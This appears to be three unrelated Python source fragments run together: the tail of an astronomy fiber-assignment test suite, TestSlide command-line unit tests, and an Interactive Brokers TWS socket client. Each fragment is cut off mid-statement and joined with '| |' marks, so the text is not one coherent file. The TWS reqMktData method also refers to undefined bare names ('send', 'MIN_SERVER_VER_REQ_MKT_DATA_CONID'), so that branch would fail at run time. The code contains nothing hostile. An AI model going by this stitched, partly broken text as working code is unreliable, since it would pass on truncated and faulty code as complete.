plotpetals = [0]
#plotpetals = None
plot_tiles(hw, tiles, result_dir=test_dir, plot_dir=test_dir,
result_prefix="fba-",
real_shapes=True, petals=plotpetals, serial=True)
qa_tiles(hw, tiles, result_dir=test_dir)
qadata = None
with open(os.path.join(test_dir, "qa.json"), "r") as f:
qadata = json.load(f)
for tile, props in qadata.items():
self.assertTrue(props["assign_science"] >= 4485)
self.assertEqual(100, props["assign_std"])
if do_stucksky:
# We get 3 stuck positioners landing on good sky!
self.assertTrue(
(props["assign_sky"] + props["assign_suppsky"]) >= 397
)
else:
self.assertTrue(
(props["assign_sky"] + props["assign_suppsky"]) >= 400
)
plot_qa(qadata, os.path.join(test_dir, "qa"), outformat="pdf",
labels=True)
return
def test_cli(self):
test_dir = test_subdir_create("assign_test_cli")
np.random.seed(123456789)
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
opts = {
"targets": [input_mtl, input_std, input_sky, input_suppsky],
"dir": test_dir,
"footprint": tfile,
"standards_per_petal": 10,
"sky_per_petal": 40,
"overwrite": True,
"rundate": test_assign_date
}
optlist = option_list(opts)
args = parse_assign(optlist)
run_assign_full(args)
plotpetals = "0"
#plotpetals = "0,1,2,3,4,5,6,7,8,9"
opts = {
"footprint": tfile,
"dir": test_dir,
"petals": plotpetals,
"serial": True,
"rundate": test_assign_date
}
optlist = option_list(opts)
args = parse_plot(optlist)
run_plot(args)
opts = {
"dir": test_dir
}
optlist = option_list(opts)
args = parse_qa(optlist)
run_qa(args)
opts = {
"qafile": os.path.join(test_dir, "qa.json")
}
optlist = option_list(opts)
args = parse_plot_qa(optlist)
run_plot_qa(args)
with open(os.path.join(test_dir, "qa.json"), "r") as f:
qadata = json.load(f)
for tile, props in qadata.items():
self.assertTrue(props["assign_science"] >= 4490)
self.assertEqual(100, props["assign_std"])
self.assertTrue(
(props["assign_sky"] + props["assign_suppsky"]) >= 400
)
return
def test_fieldrot(self):
test_dir = test_subdir_create("assign_test_fieldrot")
np.random.seed(123456789)
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
# Simulate the tiles
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
# petal mapping
rotator = petal_rotation(1, reverse=False)
rots = [0, 36]
tile_ids = None
for rt in rots:
odir = "theta_{:02d}".format(rt)
tgs = Targets()
load_target_file(tgs, input_mtl)
load_target_file(tgs, input_std)
load_target_file(tgs, input_sky)
load_target_file(tgs, input_suppsky)
# Create a hierarchical triangle mesh lookup of the targets
# positions
tree = TargetTree(tgs, 0.01)
# Manually override the field rotation
tiles = load_tiles(tiles_file=tfile, obstheta=float(rt))
if tile_ids | |
<filename>tests/cli_unittest.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import os
import os.path
import pty
import re
import subprocess
import sys
import threading
import unittest
import testslide
class TestCliBase(unittest.TestCase):
SAMPLE_TESTS_PATH = os.path.dirname(__file__) + "/sample_tests.py"
def setUp(self):
self.argv = [self.SAMPLE_TESTS_PATH]
self.env = {
"COVERAGE_PROCESS_START": ".coveragerc",
}
super(TestCliBase, self).setUp()
def run_testslide(
self,
tty_stdout=False,
expected_return_code=0,
expected_stdout=None,
expected_stdout_startswith=None,
expected_in_stdout=None,
expected_not_in_stdout=None,
expected_regex_in_stdout=None,
show_testslide_stack_trace=True,
):
args = [
sys.executable,
"-m",
"testslide.cli",
]
if show_testslide_stack_trace:
args.append("--show-testslide-stack-trace")
args.extend(self.argv)
env = dict(copy.copy(os.environ))
env.update(self.env)
if tty_stdout:
stdout_master_fd, stdout_slave_fd = pty.openpty()
encoding = sys.getdefaultencoding()
with subprocess.Popen(
args,
bufsize=1,
stdin=subprocess.DEVNULL,
stdout=stdout_slave_fd if tty_stdout else subprocess.PIPE,
stderr=subprocess.PIPE,
encoding=encoding,
env=env,
universal_newlines=True,
) as popen:
stdout_chunks = []
stderr_chunks = []
def _process_output(fd, callback):
while True:
try:
chunk = os.read(fd, 8192)
except OSError:
break
if len(chunk):
callback(chunk)
else:
break
if tty_stdout:
stdout_fileno = stdout_master_fd
else:
stdout_fileno = popen.stdout.fileno()
process_stdout_thread = threading.Thread(
target=_process_output,
name="process_stdout",
args=(stdout_fileno, lambda line: stdout_chunks.append(line)),
)
process_stdout_thread.start()
process_stderr_thread = threading.Thread(
target=_process_output,
name="process_stderr",
args=(popen.stderr.fileno(), lambda line: stderr_chunks.append(line)),
)
process_stderr_thread.start()
return_code = popen.wait()
if tty_stdout:
os.close(stdout_slave_fd)
process_stdout_thread.join()
process_stderr_thread.join()
stdout_output = "".join(chunk.decode(encoding) for chunk in stdout_chunks)
stderr_output = "".join(chunk.decode(encoding) for chunk in stderr_chunks)
output = ""
if stdout_output:
output += f"STDOUT:\n{stdout_output}\n"
if stderr_output:
output += f"STDERR:\n{stderr_output}\n"
self.assertEqual(
return_code,
expected_return_code,
f"Command {args} returned {return_code}, "
f"expected {expected_return_code}.\n{output}",
)
if expected_stdout:
self.assertEqual(
stdout_output,
expected_stdout,
f"Command {args} expected to have have this stdout:\n\n"
f"{expected_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_stdout_startswith:
self.assertTrue(
stdout_output.startswith(expected_stdout_startswith),
f"Command {args} expected to have have its stdout starting with:\n\n"
f"{expected_stdout_startswith}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_in_stdout:
self.assertTrue(
expected_in_stdout in stdout_output,
f"Command {args} expected to have have in its stdout:\n\n"
f"{expected_in_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_not_in_stdout:
self.assertTrue(
expected_not_in_stdout not in stdout_output,
f"Command {args} expected to not have have in its stdout:\n\n"
f"{expected_not_in_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_regex_in_stdout:
self.assertTrue(
re.fullmatch(expected_regex_in_stdout, stdout_output, flags=re.DOTALL),
f"Command {args} expected to have have its stdout matching the regexp:\n\n"
f"{expected_regex_in_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
@staticmethod
def white(text):
return "\x1b[0m\x1b[1m{}\x1b[0m".format(text)
@staticmethod
def green(text):
return "\x1b[0m\x1b[32m{}\x1b[0m".format(text)
@staticmethod
def red(text):
return "\x1b[0m\x1b[31m{}\x1b[0m".format(text)
@staticmethod
def yellow(text):
return "\x1b[0m\x1b[33m{}\x1b[0m".format(text)
@staticmethod
def cyan(text):
return "\x1b[0m\x1b[36m{}\x1b[0m".format(text)
class TestCliList(TestCliBase):
def setUp(self):
super().setUp()
self.argv.insert(0, "--list")
def test_list(self):
"""
With --list, print test names one per line.
"""
self.run_testslide(
expected_stdout=(
"top context: passing example\n"
"top context: failing example\n"
"top context: focused example\n"
"top context: skipped example\n"
"top context: unittest SkipTest\n"
"top context, nested context: passing nested example\n"
"tests.sample_tests.SampleTestCase: test_failing\n"
"tests.sample_tests.SampleTestCase: test_passing\n"
"tests.sample_tests.SampleTestCase: test_skipped\n"
)
)
class TestCliQuiet(TestCliBase):
def setUp(self):
super().setUp()
self.env = {"PRINT": "True"}
def test_with_quiet(self):
"""
With --quiet, swallow both stderr and stdout unless the test fails.
"""
self.argv.insert(0, "--quiet")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
"stdout:\n"
"failing_example stdout\n"
"\n"
"stderr:\n"
"failing_example stderr\n"
"\n"
" failing example: SimulatedFailure: test failure (extra)\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
"stdout:\n"
"test_fail stdout\n"
"\n"
"stderr:\n"
"test_fail stderr\n"
"\n"
" test_failing: AssertionError: Third\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
# TODO Rest of the output
),
)
def test_without_quiet(self):
"""
Without --quiet, allow test stdout and stderr to go on.
"""
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
"passing_example stdout\n"
" passing example: PASS\n"
"failing_example stdout\n"
" failing example: SimulatedFailure: test failure (extra)\n"
"focused_example stdout\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
"unittest_SkipTest stdout\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
"passing_nested_example stdout\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
"test_fail stdout\n"
" test_failing: AssertionError: Third\n"
"test_pass stdout\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
# TODO Rest of the output
),
)
class FormatterMixin:
def test_prints_exceptions_with_cause(self):
self.run_testslide(
tty_stdout=True,
expected_return_code=1,
expected_in_stdout=(
' File \033[36m"tests/sample_tests.py"\033[39;49;00m, line \033[34m76\033[39;49;00m, in test_failing\r\n'
' \033[34mraise\033[39;49;00m \033[36mAssertionError\033[39;49;00m(\033[33m"\033[39;49;00m\033[33mThird\033[39;49;00m\033[33m"\033[39;49;00m) \033[34mfrom\033[39;49;00m \033[04m\033[36mcause\033[39;49;00m\r\n'
"\033[0m\033[31m Caused by \033[0m\033[0m\033[31mAssertionError: Second\033[0m\r\n"
' File \033[36m"tests/sample_tests.py"\033[39;49;00m, line \033[34m74\033[39;49;00m, in test_failing\r\n'
' \033[34mraise\033[39;49;00m \033[36mAssertionError\033[39;49;00m(\033[33m"\033[39;49;00m\033[33mSecond\033[39;49;00m\033[33m"\033[39;49;00m) \033[34mfrom\033[39;49;00m \033[04m\033[36mcause\033[39;49;00m\r\n'
"\033[0m\033[31m Caused by \033[0m\033[0m\033[31mAssertionError: First\033[0m\r\n"
' File \033[36m"tests/sample_tests.py"\033[39;49;00m, line \033[34m72\033[39;49;00m, in test_failing\r\n'
' \033[34mraise\033[39;49;00m \033[36mAssertionError\033[39;49;00m(\033[33m"\033[39;49;00m\033[33mFirst\033[39;49;00m\033[33m"\033[39;49;00m)\r\n'
),
)
def test_default_trim_path_prefix(self):
"""
Default value for --trim-path-prefix trims path shared with
testslide itself.
"""
self.run_testslide(
expected_return_code=1,
expected_in_stdout=('File "tests/sample_tests.py", line'),
)
def test_nonempty_trim_path_prefix(self):
"""
Trims prefix passed to --trim-path-prefix.
"""
self.argv.append("--trim-path-prefix")
self.argv.append(os.path.dirname(self.SAMPLE_TESTS_PATH) + "/")
self.run_testslide(
expected_return_code=1,
expected_in_stdout=(
'File "' + os.path.basename(self.SAMPLE_TESTS_PATH) + '", line'
),
)
def test_empty_trim_path_prefix(self):
"""
Trims nothing if '' passed to --trim-path-prefix.
"""
self.argv.append("--trim-path-prefix")
self.argv.append("")
self.run_testslide(
expected_return_code=1,
expected_in_stdout=('File "' + self.SAMPLE_TESTS_PATH + '", line'),
)
def test_not_show_testslide_stack_trace(self):
self.run_testslide(
expected_return_code=1,
show_testslide_stack_trace=False,
expected_not_in_stdout=os.path.abspath(os.path.dirname(testslide.__file__)),
)
class TestCliDocumentFormatter(FormatterMixin, TestCliBase):
def setUp(self):
super().setUp()
self.argv = ["--format", "documentation"] + self.argv
def test_colored_output_to_terminal(self):
"""
Execute all examples in the order defined with colored output.
"""
self.run_testslide(
tty_stdout=True,
expected_return_code=1,
expected_stdout_startswith=(
self.white("top context")
+ "\r\n"
+ self.green(" passing example")
+ "\r\n"
+ self.red(" failing example: SimulatedFailure: test failure (extra)")
+ "\r\n"
+ self.green(" *focused example")
+ "\r\n"
+ self.yellow(" skipped example")
+ "\r\n"
+ self.yellow(" unittest SkipTest")
+ "\r\n"
+ self.white(" nested context")
+ "\r\n"
+ self.green(" passing nested example")
+ "\r\n"
# TODO Rest of the output
),
)
def test_colored_output_with_force_color(self):
"""
Execute all examples in the order defined with colored output.
"""
self.argv.append("--force-color")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
self.white("top context")
+ "\n"
+ self.green(" passing example")
+ "\n"
+ self.red(" failing example: SimulatedFailure: test failure (extra)")
+ "\n"
+ self.green(" *focused example")
+ "\n"
+ self.yellow(" skipped example")
+ "\n"
+ self.yellow(" unittest SkipTest")
+ "\n"
+ self.white(" nested context")
+ "\n"
+ self.green(" passing nested example")
+ "\n"
# TODO add remaining bits of the output (using regexes)
),
)
def test_plain_output_without_terminal(self):
"""
Execute all examples in the order defined without color.
"""
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
" test_failing: AssertionError: Third\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
# TODO add remaining bits of the output (using regexes)
),
)
def test_shuffle(self):
"""
Shuffle execution order.
"""
self.argv.append("--shuffle")
self.argv.append("--seed")
self.argv.append("33")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
"tests.sample_tests.SampleTestCase\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
" test_failing: AssertionError: Third\n"
"top context\n"
" skipped example: SKIP\n"
" *focused example: PASS\n"
"\n"
"Failures:\n"
# TODO add remaining bits of the output (using regexes)
),
)
def test_focus(self):
"""
Execute only focused examples.
"""
self.argv.append("--focus")
self.run_testslide(
expected_stdout_startswith=(
"top context\n"
" *focused example: PASS\n"
"\n"
"Finished 1 example(s) in "
# TODO add remaining bits of the output (using regexes)
)
)
def test_fail_if_focus(self):
"""
Fail because there are focused tests and --fail-if-focused
"""
self.argv.append("--fail-if-focused")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
" *focused example: AssertionError: Focused example not allowed with --fail-if-focused. Please remove the focus to allow the test to run.\n"
" skipped example: SKIP\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
" test_failing: AssertionError: Third\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
),
)
def test_fail_fast(self):
"""
Stop execution when first example fails.
"""
self.argv.append("--fail-fast")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
"\n"
"Failures:\n"
),
)
def test_text_filter(self):
"""
Execute only examples matching partial text filter.
"""
self.argv.append("--filter-text")
self.argv.append("nested context: passing nested ex")
self.run_testslide(
expected_return_code=0,
expected_stdout_startswith=(
"top context\n"
" nested context\n"
" passing nested example: PASS\n"
"\n"
"Finished 1 example(s) in "
),
)
def test_regexp_filter(self):
"""
Execute only examples matching regex filter.
"""
self.argv.append("--filter-regex")
self.argv.append(".*passing nested.*")
self.run_testslide(
expected_return_code=0,
expected_stdout_startswith=(
"top context\n"
" nested context\n"
" passing nested example: PASS\n"
"\n"
"Finished 1 example(s) in "
),
)
def test_exclude_regexp(self):
"""
Skip examples matching regex filter.
"""
self.argv.append("--exclude-regex")
self.argv.append(".*failing.*")
self.run_testslide(
expected_return_code=0,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
" unittest SkipTest: | |
<gh_stars>0
'''Main connection to TWS client.
Defines the EClientSocket class, which implements a socket connection to
the TWS socket server, through which the entire API operates.
'''
from __future__ import with_statement
__copyright__ = "Copyright (c) 2008 <NAME>"
__version__ = "$Id$"
import tws._EClientErrors as _EClientErrors
from tws._EWrapper import EWrapper as _wrapper_factory
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Decorators to support package
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def synchronized(f):
'''Thread mutex-locking decorator.'''
assert (__import__("inspect").getargspec(f)[0][0] == "self")
def _synchronized_call(self, *args, **kwds):
assert hasattr(self, "mutex")
with self.mutex:
return f(self, *args, **kwds)
return _synchronized_call
def requestmethod(has_id=False, min_server=0,
min_server_error_suffix="",
generic_error=_EClientErrors.TwsError(),
generic_error_suffix=""):
'''Socket request-method decorator.
Eliminates repetitive error-checking boilerplate from request methods.
'''
assert isinstance(has_id, bool)
assert isinstance(min_server, int)
assert isinstance(min_server_error_suffix, str)
assert isinstance(generic_error, _EClientErrors.TwsError)
assert isinstance(generic_error_suffix, str)
def _decorator(method):
assert (__import__("inspect").getargspec(method)[0][0] == "self")
#assert ((not has_id) or (__import__("inspect").getargspec(method)[0][1] == "id"))
def _decorated(self, *args, **kwds):
assert isinstance(self, EClientSocket)
try:
# Socket client must be connected.
if not self._connected:
self._error(_EClientErrors.NOT_CONNECTED)
return
# Enforce minimum server version, if any.
if self._server_version < min_server:
self._error(_EClientErrors.TwsError(
id=kwds.get("id", args[0] if args else _EClientErrors.NO_VALID_ID)
if has_id else _EClientErrors.NO_VALID_ID,
source=_EClientErrors.UPDATE_TWS,
msg=min_server_error_suffix or None))
return
# Call wrapped method, ensuring stream gets flushed.
result = method(self, *args, **kwds)
self._stream.flush()
return result
# Reraise assertion errors.
except AssertionError: raise
# Any other exception report generic error instance to EWrapper._error()
except:
self._error(_EClientErrors.TwsError(
source=generic_error,
id=kwds.get("id", args[0] if args else _EClientErrors.NO_VALID_ID)
if has_id else _EClientErrors.NO_VALID_ID,
msg=generic_error_suffix or method.__name__))
self._close()
return _decorated
return _decorator
class EClientSocket(object):
'''Socket client which connects to the TWS socket server.
'''
from socket import socket as _socket_factory
def __init__(self, wrapper=None):
assert isinstance(wrapper, __import__("tws").EWrapper) or wrapper is None
if wrapper is None:
wrapper = _wrapper_factory()
if wrapper.client:
raise ValueError("Wrapper object is already assigned to a SocketClient.")
self._mutex = __import__("threading").RLock()
self._wrapper = wrapper
self._reader = None
self._connected = False
self._server_version = 0
self._tws_time = 0
self._wrapper._client = self
@synchronized
def _close(self):
assert self._connected
try:
self.eDisconnect()
finally:
self._wrapper.connectionClosed()
def _send(self, data):
if type(data) in (str, int, long, float):
self._stream.write(str(data))
elif type(data) == bool:
self._stream.write("1" if data else "0")
elif data is None:
pass
else:
raise ValueError("Unknown data type for EClientSocket._send(): %s", type(data))
self._stream.write(self.EOL)
def _sendMax(self, data):
if type(data) == int:
self._send(data) if data != self._INT_MAX_VALUE else self._send(None)
elif type(data) == float:
self._send(data) if data != self._DOUBLE_MAX_VALUE else self._send(None)
else:
raise ValueError("Unknown data type for EClientSocket._sendMax(): %s", type(data))
@synchronized
def _error(self, e):
self._wrapper.error(e)
@classmethod
def faMsgTypeName(cls, faDataType):
if faDataType == cls.GROUPS:
return "GROUPS"
elif faDataType == cls.PROFILES:
return "PROFILES"
elif faDataType == cls.ALIASES:
return "ALIASES"
# Should never get here.
assert False
return ""
# General constants
CLIENT_VERSION = 48
SERVER_VERSION = 38
EOL = "\x00"
BAG_SEC_TYPE = "BAG"
# API tag constants
REQ_MKT_DATA = 1
CANCEL_MKT_DATA = 2
PLACE_ORDER = 3
CANCEL_ORDER = 4
REQ_OPEN_ORDERS = 5
REQ_ACCOUNT_DATA = 6
REQ_EXECUTIONS = 7
REQ_IDS = 8
REQ_CONTRACT_DATA = 9
REQ_MKT_DEPTH = 10
CANCEL_MKT_DEPTH = 11
REQ_NEWS_BULLETINS = 12
CANCEL_NEWS_BULLETINS = 13
SET_SERVER_LOGLEVEL = 14
REQ_AUTO_OPEN_ORDERS = 15
REQ_ALL_OPEN_ORDERS = 16
REQ_MANAGED_ACCTS = 17
REQ_FA = 18
REPLACE_FA = 19
REQ_HISTORICAL_DATA = 20
EXERCISE_OPTIONS = 21
REQ_SCANNER_SUBSCRIPTION = 22
CANCEL_SCANNER_SUBSCRIPTION = 23
REQ_SCANNER_PARAMETERS = 24
CANCEL_HISTORICAL_DATA = 25
REQ_CURRENT_TIME = 49
REQ_REAL_TIME_BARS = 50
CANCEL_REAL_TIME_BARS = 51
REQ_FUNDAMENTAL_DATA = 52
CANCEL_FUNDAMENTAL_DATA = 53
REQ_CALC_IMPLIED_VOLAT = 54
REQ_CALC_OPTION_PRICE = 55
CANCEL_CALC_IMPLIED_VOLAT = 56
CANCEL_CALC_OPTION_PRICE = 57
REQ_GLOBAL_CANCEL = 58
MIN_SERVER_VER_REAL_TIME_BARS = 34
MIN_SERVER_VER_SCALE_ORDERS = 35
MIN_SERVER_VER_SNAPSHOT_MKT_DATA = 35
MIN_SERVER_VER_SSHORT_COMBO_LEGS = 35
MIN_SERVER_VER_WHAT_IF_ORDERS = 36
MIN_SERVER_VER_CONTRACT_CONID = 37
MIN_SERVER_VER_PTA_ORDERS = 39
MIN_SERVER_VER_FUNDAMENTAL_DATA = 40
MIN_SERVER_VER_UNDER_COMP = 40
MIN_SERVER_VER_CONTRACT_DATA_CHAIN = 40
MIN_SERVER_VER_SCALE_ORDERS2 = 40
MIN_SERVER_VER_ALGO_ORDERS = 41
MIN_SERVER_VER_EXECUTION_DATA_CHAIN = 42
MIN_SERVER_VER_NOT_HELD = 44
MIN_SERVER_VER_SEC_ID_TYPE = 45
MIN_SERVER_VER_PLACE_ORDER_CONID = 46
MIN_SERVER_VER_REQ_MKT_DATA_CONID = 47
MIN_SERVER_VER_REQ_CALC_IMPLIED_VOLAT = 49
MIN_SERVER_VER_REQ_CALC_OPTION_PRICE = 50
MIN_SERVER_VER_CANCEL_CALC_IMPLIED_VOLAT = 50
MIN_SERVER_VER_CANCEL_CALC_OPTION_PRICE = 50
MIN_SERVER_VER_SSHORTX_OLD = 51
MIN_SERVER_VER_SSHORTX = 52
MIN_SERVER_VER_REQ_GLOBAL_CANCEL = 53
# Message Type name constants
GROUPS = 1
PROFILES = 2
ALIASES = 3
# Private class imports
from tws._Util import _INT_MAX_VALUE
from tws._Util import _DOUBLE_MAX_VALUE
@property
def mutex(self):
'''Mutex for client thread synchronization.'''
return self._mutex
def wrapper(self):
return self._wrapper
def reader(self):
return self._reader
def isConnected(self):
return self._connected
def serverVersion(self):
return self._server_version
def TwsConnectionTime(self):
return self._tws_time
def checkConnected(self, host):
assert isinstance(host, str) or (host == None)
if self._connected:
self._wrapper.error(_EClientErrors.ALREADY_CONNECTED)
return None
return host if host else "127.0.0.1"
def connectionError(self):
self._wrapper.error(_EClientErrors.CONNECT_FAIL)
self._reader = None
def createReader(self, input_stream):
assert hasattr(input_stream, "read")
return __import__("tws").EReader(self, input_stream)
@synchronized
def eConnect(self, client_id, stream=None, socket=None, host="", port=0,
negotiate=True, start_reader=True,
stdout=__import__("sys").stdout):
assert isinstance(client_id, int)
assert isinstance(negotiate, bool)
assert isinstance(start_reader, bool)
assert hasattr(stdout, "write") or not stdout
assert hasattr(stream, "read") or not stream
assert hasattr(socket, "makefile") or not socket
assert isinstance(host, str)
assert isinstance(port, int)
assert ((host or port) and not (socket or stream)) or ((not host) and (not port))
assert (socket and not stream) or (not socket)
if self._connected: return
if (host and port) and not socket:
socket = self._socket_factory()
socket.connect((host, port))
if socket and not stream:
stream = socket.makefile("r+")
socket.close() # Won't actually close until stream does.
self._stream = stream
self._reader = self.createReader(self._stream)
try:
self._connected = self._stream and not self._stream.closed
if negotiate:
if hasattr(self._stream, "seek"):
self._stream.seek(0, 2)
self._send(self.CLIENT_VERSION);
self._stream.flush()
if hasattr(self._stream, "seek"):
self._stream.seek(0, 0)
self._server_version = self._reader._readInt();
if stdout:
stdout.write("Server Version: %d\n" % self._server_version);
if self._server_version < self.SERVER_VERSION:
self.eDisconnect()
self._wrapper.error(_EClientErrors.TwsError(source=_EClientErrors.UPDATE_TWS))
return
self._tws_time = self._reader._readStr()
if stdout:
stdout.write("TWS Time at connection: %s\n" % self._tws_time)
if hasattr(self._stream, "seek"):
self._stream.seek(0, 2)
self._send(client_id)
self._stream.flush()
if self._connected and start_reader:
self._reader.start()
except:
self.eDisconnect()
raise
@synchronized
def eDisconnect(self):
if not self._connected: return
self._connected = False
self._server_version = 0
self._tws_time = ""
try:
self._reader.interrupt()
assert self._stream.closed
finally:
self._reader = None
self._stream = None
@synchronized
@requestmethod(has_id=True, min_server=24,
min_server_error_suffix="It does not support API scanner subscription.",
generic_error=_EClientErrors.FAIL_SEND_CANSCANNER)
def cancelScannerSubscription(self, id):
assert isinstance(id, int)
VERSION = 1
self._send(self.CANCEL_SCANNER_SUBSCRIPTION)
self._send(VERSION)
self._send(id)
@synchronized
@requestmethod(min_server=24,
min_server_error_suffix="It does not support API scanner subscription.",
generic_error=_EClientErrors.FAIL_SEND_REQSCANNERPARAMETERS)
def reqScannerParameters(self):
VERSION = 1
self._send(self.REQ_SCANNER_PARAMETERS)
self._send(VERSION)
@synchronized
@requestmethod(has_id=True, min_server=24,
min_server_error_suffix="It does not support API scanner subscription.",
generic_error=_EClientErrors.FAIL_SEND_REQSCANNER)
def reqScannerSubscription(self, id, subscription):
assert isinstance(id, int)
assert isinstance(subscription, __import__("tws").ScannerSubscription)
VERSION = 3
self._send(self.REQ_SCANNER_SUBSCRIPTION)
self._send(VERSION)
self._send(id)
self._sendMax(subscription.numberOfRows())
self._send(subscription.instrument())
self._send(subscription.locationCode())
self._send(subscription.scanCode())
self._sendMax(subscription.abovePrice())
self._sendMax(subscription.belowPrice())
self._sendMax(subscription.aboveVolume())
self._sendMax(subscription.marketCapAbove())
self._sendMax(subscription.marketCapBelow())
self._send(subscription.moodyRatingAbove())
self._send(subscription.moodyRatingBelow())
self._send(subscription.spRatingAbove())
self._send(subscription.spRatingBelow())
self._send(subscription.maturityDateAbove())
self._send(subscription.maturityDateBelow())
self._sendMax(subscription.couponRateAbove())
self._sendMax(subscription.couponRateBelow())
self._send(subscription.excludeConvertible())
if self._server_version >= 25:
self._send(subscription.averageOptionVolumeAbove())
self._send(subscription.scannerSettingPairs())
if self._server_version >= 27:
self._send(subscription.stockTypeFilter())
@synchronized
@requestmethod(has_id=True,
generic_error=_EClientErrors.FAIL_SEND_REQMKT)
def reqMktData(self, id, contract, generic_tick_list, snapshot):
assert isinstance(id, int)
assert isinstance(contract, __import__("tws").Contract)
assert isinstance(generic_tick_list, str)
assert isinstance(snapshot, bool)
VERSION = 9
if contract.m_underComp and (self._server_version < self.MIN_SERVER_VER_UNDER_COMP):
self._error(_EClientErrors.TwsError( source=_EClientErrors.UPDATE_TWS,
id=id,
msg="It does not support delta-neutral orders."))
return
if snapshot and (self._server_version < self.MIN_SERVER_VER_SNAPSHOT_MKT_DATA):
self._error(_EClientErrors.TwsError( source=_EClientErrors.UPDATE_TWS,
id=id,
msg="It does not support snapshot market data requests."))
return
if contract.m_conId and (self._server_version < self.MIN_SERVER_VER_REQ_MKT_DATA_CONID):
self._error(_EClientErrors.TwsError( source=_EClientErrors.UPDATE_TWS,
id=id,
msg="It does not support conId parameter."))
return
self._send(self.REQ_MKT_DATA)
self._send(VERSION)
self._send(id)
if self._server_version >= MIN_SERVER_VER_REQ_MKT_DATA_CONID:
send(contract.m_conId)
self._send(contract.m_symbol)
self._send(contract.m_secType)
self._send(contract.m_expiry)
self._send(contract.m_strike)
self._send(contract.m_right)
if self._server_version >= 15:
self._send(contract.m_multiplier)
self._send(contract.m_exchange)
if self._server_version >= 14:
self._send(contract.m_primaryExch)
self._send(contract.m_currency)
if self._server_version >= 2:
self._send(contract.m_localSymbol)
if (self._server_version >= 8):
if self.BAG_SEC_TYPE.lower() == contract.m_secType.lower():
self._send(len(contract.m_comboLegs))
for leg in contract.m_comboLegs:
self._send(leg.m_conId)
self._send(leg.m_ratio)
self._send(leg.m_action)
self._send(leg.m_exchange)
if self._server_version >= self.MIN_SERVER_VER_UNDER_COMP:
self._send(bool(contract.m_underComp))
if contract.m_underComp:
self._send(contract.m_underComp.m_conId)
self._send(contract.m_underComp.m_delta)
self._send(contract.m_underComp.m_price)
if self._server_version >= 31:
self._send(generic_tick_list)
if self._server_version >= self.MIN_SERVER_VER_SNAPSHOT_MKT_DATA:
self._send(snapshot)
@synchronized
@requestmethod(has_id=True, min_server=24,
min_server_error_suffix="It does not support historical data query cancellation.",
generic_error=_EClientErrors.FAIL_SEND_CANHISTDATA)
def cancelHistoricalData(self, id):
assert isinstance(id, int)
VERSION = 1
